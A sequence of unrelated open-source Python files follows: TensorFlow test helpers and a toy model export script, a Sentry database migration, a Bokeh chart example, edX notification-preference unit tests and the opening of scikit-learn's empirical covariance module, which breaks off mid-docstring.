# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains helpers used by tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.constrained_optimization.python import constrained_minimization_problem
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import standard_ops
class ConstantMinimizationProblem(
constrained_minimization_problem.ConstrainedMinimizationProblem):
"""A `ConstrainedMinimizationProblem` with constant constraint violations.
This minimization problem is intended for use in performing simple tests of
the Lagrange multiplier (or equivalent) update in the optimizers. There is a
one-element "dummy" model parameter, but it should be ignored.
"""
def __init__(self, constraints):
"""Constructs a new `ConstantMinimizationProblem'.
Args:
constraints: 1d numpy array, the constant constraint violations.
Returns:
A new `ConstantMinimizationProblem'.
"""
    # We make a fake 1-parameter linear objective so that we don't get a "no
# variables to optimize" error.
self._objective = standard_ops.Variable(0.0, dtype=dtypes.float32)
self._constraints = standard_ops.constant(constraints, dtype=dtypes.float32)
@property
def objective(self):
"""Returns the objective function."""
return self._objective
@property
def constraints(self):
"""Returns the constant constraint violations."""
return self._constraints
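# Illustrative usage sketch, not part of this module: a problem whose constraint violations
# are the constants below; the values are made up for demonstration only.
#
#     import numpy as np
#     problem = ConstantMinimizationProblem(np.array([0.1, -0.2]))
#     # problem.constraints is a constant float32 tensor, problem.objective a dummy variable.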
|
SilentCircle/sentry
|
refs/heads/master
|
src/sentry/migrations/0063_auto.py
|
4
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding index on 'MessageCountByMinute', fields ['date']
db.create_index('sentry_messagecountbyminute', ['date'])
def backwards(self, orm):
# Removing index on 'MessageCountByMinute', fields ['date']
db.delete_index('sentry_messagecountbyminute', ['date'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filterkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'FilterKey'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['auth.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'unique': 'True', 'null': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Team']", 'null': 'True'})
},
'sentry.projectcountbyminute': {
'Meta': {'unique_together': "(('project', 'date'),)", 'object_name': 'ProjectCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.searchdocument': {
'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'token_set'", 'to': "orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.team': {
'Meta': {'object_name': 'Team'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_teammember_set'", 'to': "orm['auth.User']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.view': {
'Meta': {'object_name': 'View'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'verbose_name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['sentry']
|
addappio/serving
|
refs/heads/develop
|
tensorflow_serving/servables/tensorflow/testdata/export_bad_half_plus_two.py
|
3
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Exports a toy TensorFlow model without signatures.
Exports half_plus_two TensorFlow model to /tmp/bad_half_plus_two/ without
signatures. This is used to test the fault-tolerance of tensorflow_model_server.
"""
import os
# This is a placeholder for a Google-internal import.
import tensorflow as tf
def Export():
export_path = "/tmp/bad_half_plus_two/00000123"
with tf.Session() as sess:
# Make model parameters a&b variables instead of constants to
# exercise the variable reloading mechanisms.
a = tf.Variable(0.5)
b = tf.Variable(2.0)
# Calculate, y = a*x + b
# here we use a placeholder 'x' which is fed at inference time.
x = tf.placeholder(tf.float32)
y = tf.add(tf.multiply(a, x), b)
# Export the model without signatures.
# Note that the model is intentionally exported without using exporter,
# but using the same format. This is to avoid exporter creating default
# empty signatures upon export.
tf.global_variables_initializer().run()
saver = tf.train.Saver()
saver.export_meta_graph(
filename=os.path.join(export_path, "export.meta"))
saver.save(sess,
os.path.join(export_path, "export"),
write_meta_graph=False)
def main(_):
Export()
if __name__ == "__main__":
tf.app.run()
|
evidation-health/bokeh
|
refs/heads/master
|
examples/charts/file/dots.py
|
6
|
from collections import OrderedDict
from bokeh._legacy_charts import Dot, show, output_file
# create some example data
xyvalues = OrderedDict(
python=[2, 3, 7, 5, 26],
pypy=[12, 33, 47, 15, 126],
jython=[22, 43, 10, 25, 26],
)
# any of the following commented are also valid Dot inputs
#xyvalues = pd.DataFrame(xyvalues)
#xyvalues = list(xyvalues.values())
#xyvalues = np.array(list(xyvalues.values()))
output_file("dots.html")
dots = Dot(
xyvalues, cat=['lists','loops','dicts', 'gen exp', 'exceptions'],
title="Dots Example", ylabel='Performance', legend=True
)
show(dots)
|
defance/edx-platform
|
refs/heads/master
|
lms/djangoapps/notification_prefs/tests.py
|
137
|
import json
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import PermissionDenied
from django.http import Http404
from django.test import TestCase
from django.test.client import RequestFactory
from django.test.utils import override_settings
from mock import Mock, patch
from notification_prefs import NOTIFICATION_PREF_KEY
from notification_prefs.views import ajax_enable, ajax_disable, ajax_status, set_subscription, UsernameCipher
from student.tests.factories import UserFactory
from edxmako.tests import mako_middleware_process_request
from openedx.core.djangoapps.user_api.models import UserPreference
from util.testing import UrlResetMixin
@override_settings(SECRET_KEY="test secret key")
class NotificationPrefViewTest(UrlResetMixin, TestCase):
INITIALIZATION_VECTOR = "\x00" * 16
@patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUp(self):
super(NotificationPrefViewTest, self).setUp()
self.user = UserFactory.create(username="testuser")
# Tokens are intentionally hard-coded instead of computed to help us
# avoid breaking existing links.
self.tokens = {
self.user: "AAAAAAAAAAAAAAAAAAAAAA8mMQo96FZfb1YKv1R5X6s=",
# Username with length equal to AES block length to test padding
UserFactory.create(username="sixteencharsuser"):
"AAAAAAAAAAAAAAAAAAAAAPxPWCuI2Ay9TATBVnfw7eIj-hUh6erQ_-VkbDqHqm8D",
# Even longer username
UserFactory.create(username="thisusernameissoveryverylong"):
"AAAAAAAAAAAAAAAAAAAAAPECbYqPI7_W4mRF8LbTaHuHt3tNXPggZ1Bke-zDyEiZ",
# Non-ASCII username
UserFactory.create(username=u"\u4e2d\u56fd"):
"AAAAAAAAAAAAAAAAAAAAAMjfGAhZKIZsI3L-Z7nflTA="
}
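        # Each token above is, in effect, the base64url encoding of a 16-byte
        # AES initialization vector followed by the encrypted, padded username
        # (see the invalid-token cases in test_unsubscribe_invalid_token below).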
self.request_factory = RequestFactory()
def create_prefs(self):
"""Create all test preferences in the database"""
for (user, token) in self.tokens.items():
UserPreference.objects.create(user=user, key=NOTIFICATION_PREF_KEY, value=token)
def assertPrefValid(self, user):
"""Ensure that the correct preference for the user is persisted"""
pref = UserPreference.objects.get(user=user, key=NOTIFICATION_PREF_KEY)
self.assertTrue(pref) # check exists and only 1 (.get)
        # Coerce the username to a utf-8 encoded str, since we test with
        # non-ASCII unicode above and the unittest framework has a hard time
        # coercing to unicode. decrypt also can't take a unicode input, so
        # coerce its input to str.
self.assertEqual(str(user.username.encode('utf-8')), UsernameCipher().decrypt(str(pref.value)))
def assertNotPrefExists(self, user):
"""Ensure that the user does not have a persisted preference"""
self.assertFalse(
UserPreference.objects.filter(user=user, key=NOTIFICATION_PREF_KEY).exists()
)
# AJAX status view
def test_ajax_status_get_0(self):
request = self.request_factory.get("dummy")
request.user = self.user
response = ajax_status(request)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content), {"status": 0})
def test_ajax_status_get_1(self):
self.create_prefs()
request = self.request_factory.get("dummy")
request.user = self.user
response = ajax_status(request)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content), {"status": 1})
def test_ajax_status_post(self):
request = self.request_factory.post("dummy")
request.user = self.user
response = ajax_status(request)
self.assertEqual(response.status_code, 405)
def test_ajax_status_anon_user(self):
request = self.request_factory.get("dummy")
request.user = AnonymousUser()
self.assertRaises(PermissionDenied, ajax_status, request)
# AJAX enable view
def test_ajax_enable_get(self):
request = self.request_factory.get("dummy")
request.user = self.user
response = ajax_enable(request)
self.assertEqual(response.status_code, 405)
self.assertNotPrefExists(self.user)
def test_ajax_enable_anon_user(self):
request = self.request_factory.post("dummy")
request.user = AnonymousUser()
self.assertRaises(PermissionDenied, ajax_enable, request)
self.assertNotPrefExists(self.user)
@patch("Crypto.Random.new")
def test_ajax_enable_success(self, mock_random_new):
mock_stream = Mock()
mock_stream.read.return_value = self.INITIALIZATION_VECTOR
mock_random_new.return_value = mock_stream
def test_user(user):
request = self.request_factory.post("dummy")
request.user = user
response = ajax_enable(request)
self.assertEqual(response.status_code, 204)
self.assertPrefValid(user)
for user in self.tokens.keys():
test_user(user)
def test_ajax_enable_already_enabled(self):
self.create_prefs()
request = self.request_factory.post("dummy")
request.user = self.user
response = ajax_enable(request)
self.assertEqual(response.status_code, 204)
self.assertPrefValid(self.user)
def test_ajax_enable_distinct_values(self):
request = self.request_factory.post("dummy")
request.user = self.user
ajax_enable(request)
other_user = UserFactory.create()
request.user = other_user
ajax_enable(request)
self.assertNotEqual(
UserPreference.objects.get(user=self.user, key=NOTIFICATION_PREF_KEY).value,
UserPreference.objects.get(user=other_user, key=NOTIFICATION_PREF_KEY).value
)
# AJAX disable view
def test_ajax_disable_get(self):
self.create_prefs()
request = self.request_factory.get("dummy")
request.user = self.user
response = ajax_disable(request)
self.assertEqual(response.status_code, 405)
self.assertPrefValid(self.user)
def test_ajax_disable_anon_user(self):
self.create_prefs()
request = self.request_factory.post("dummy")
request.user = AnonymousUser()
self.assertRaises(PermissionDenied, ajax_disable, request)
self.assertPrefValid(self.user)
def test_ajax_disable_success(self):
self.create_prefs()
request = self.request_factory.post("dummy")
request.user = self.user
response = ajax_disable(request)
self.assertEqual(response.status_code, 204)
self.assertNotPrefExists(self.user)
def test_ajax_disable_already_disabled(self):
request = self.request_factory.post("dummy")
request.user = self.user
response = ajax_disable(request)
self.assertEqual(response.status_code, 204)
self.assertNotPrefExists(self.user)
# Unsubscribe view
def test_unsubscribe_post(self):
request = self.request_factory.post("dummy")
response = set_subscription(request, "dummy", subscribe=False)
self.assertEqual(response.status_code, 405)
def test_unsubscribe_invalid_token(self):
def test_invalid_token(token, message):
request = self.request_factory.get("dummy")
self.assertRaisesRegexp(Http404, "^{}$".format(message), set_subscription, request, token, False)
# Invalid base64 encoding
test_invalid_token("ZOMG INVALID BASE64 CHARS!!!", "base64url")
test_invalid_token("Non-ASCII\xff", "base64url")
test_invalid_token(self.tokens[self.user][:-1], "base64url")
# Token not long enough to contain initialization vector
test_invalid_token("AAAAAAAAAAA=", "initialization_vector")
# Token length not a multiple of AES block length
test_invalid_token(self.tokens[self.user][:-4], "aes")
# Invalid padding (ends in 0 byte)
# Encrypted value: "testuser" + "\x00" * 8
test_invalid_token("AAAAAAAAAAAAAAAAAAAAAMoazRI7ePLjEWXN1N7keLw=", "padding")
# Invalid padding (ends in byte > 16)
# Encrypted value: "testusertestuser"
test_invalid_token("AAAAAAAAAAAAAAAAAAAAAC6iLXGhjkFytJoJSBJZzJ4=", "padding")
# Invalid padding (entire string is padding)
# Encrypted value: "\x10" * 16
test_invalid_token("AAAAAAAAAAAAAAAAAAAAANRGw8HDEmlcLVFawgY9wI8=", "padding")
# Nonexistent user
# Encrypted value: "nonexistentuser\x01"
test_invalid_token("AAAAAAAAAAAAAAAAAAAAACpyUxTGIrUjnpuUsNi7mAY=", "username")
def test_unsubscribe_success(self):
self.create_prefs()
def test_user(user):
request = self.request_factory.get("dummy")
request.user = AnonymousUser()
mako_middleware_process_request(request)
response = set_subscription(request, self.tokens[user], subscribe=False)
self.assertEqual(response.status_code, 200)
self.assertNotPrefExists(user)
for user in self.tokens.keys():
test_user(user)
def test_unsubscribe_twice(self):
self.create_prefs()
request = self.request_factory.get("dummy")
request.user = AnonymousUser()
mako_middleware_process_request(request)
set_subscription(request, self.tokens[self.user], False)
response = set_subscription(request, self.tokens[self.user], subscribe=False)
self.assertEqual(response.status_code, 200)
self.assertNotPrefExists(self.user)
def test_resubscribe_success(self):
def test_user(user):
# start without a pref key
self.assertFalse(UserPreference.objects.filter(user=user, key=NOTIFICATION_PREF_KEY))
request = self.request_factory.get("dummy")
request.user = AnonymousUser()
mako_middleware_process_request(request)
response = set_subscription(request, self.tokens[user], subscribe=True)
self.assertEqual(response.status_code, 200)
self.assertPrefValid(user)
for user in self.tokens.keys():
test_user(user)
|
mjudsp/Tsallis
|
refs/heads/master
|
sklearn/covariance/empirical_covariance_.py
|
80
|
"""
Maximum likelihood covariance estimator.
"""
# Author: Alexandre Gramfort <[email protected]>
# Gael Varoquaux <[email protected]>
# Virgile Fritsch <[email protected]>
#
# License: BSD 3 clause
# avoid division truncation
from __future__ import division
import warnings
import numpy as np
from scipy import linalg
from ..base import BaseEstimator
from ..utils import check_array
from ..utils.extmath import fast_logdet, pinvh
def log_likelihood(emp_cov, precision):
"""Computes the sample mean of the log_likelihood under a covariance model
    Computes the empirical expected log-likelihood (accounting for the
    normalization terms and scaling), allowing for universal comparison
    (beyond this software package).
Parameters
----------
emp_cov : 2D ndarray (n_features, n_features)
Maximum Likelihood Estimator of covariance
precision : 2D ndarray (n_features, n_features)
The precision matrix of the covariance model to be tested
Returns
-------
sample mean of the log-likelihood
"""
p = precision.shape[0]
log_likelihood_ = - np.sum(emp_cov * precision) + fast_logdet(precision)
log_likelihood_ -= p * np.log(2 * np.pi)
log_likelihood_ /= 2.
return log_likelihood_
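# Equivalently, for an empirical covariance S, a precision matrix K and p
# features, the value returned above is
#     (-trace(S @ K) + log(det(K)) - p * log(2 * pi)) / 2
# e.g. with S = K = np.eye(p) this reduces to -p * (1 + np.log(2 * np.pi)) / 2.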
def empirical_covariance(X, assume_centered=False):
"""Computes the Maximum likelihood covariance estimator
Parameters
----------
X : ndarray, shape (n_samples, n_features)
Data from which to compute the covariance estimate
assume_centered : Boolean
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False, data are centered before computation.
Returns
-------
covariance : 2D ndarray, shape (n_features, n_features)
Empirical covariance (Maximum Likelihood Estimator).
"""
X = np.asarray(X)
if X.ndim == 1:
X = np.reshape(X, (1, -1))
if X.shape[0] == 1:
warnings.warn("Only one sample available. "
"You may want to reshape your data array")
if assume_centered:
covariance = np.dot(X.T, X) / X.shape[0]
else:
covariance = np.cov(X.T, bias=1)
if covariance.ndim == 0:
covariance = np.array([[covariance]])
return covariance
class EmpiricalCovariance(BaseEstimator):
"""Maximum likelihood covariance estimator
Read more in the :ref:`User Guide <covariance>`.
Parameters
----------
store_precision : bool
Specifies if the estimated precision is stored.
assume_centered : bool
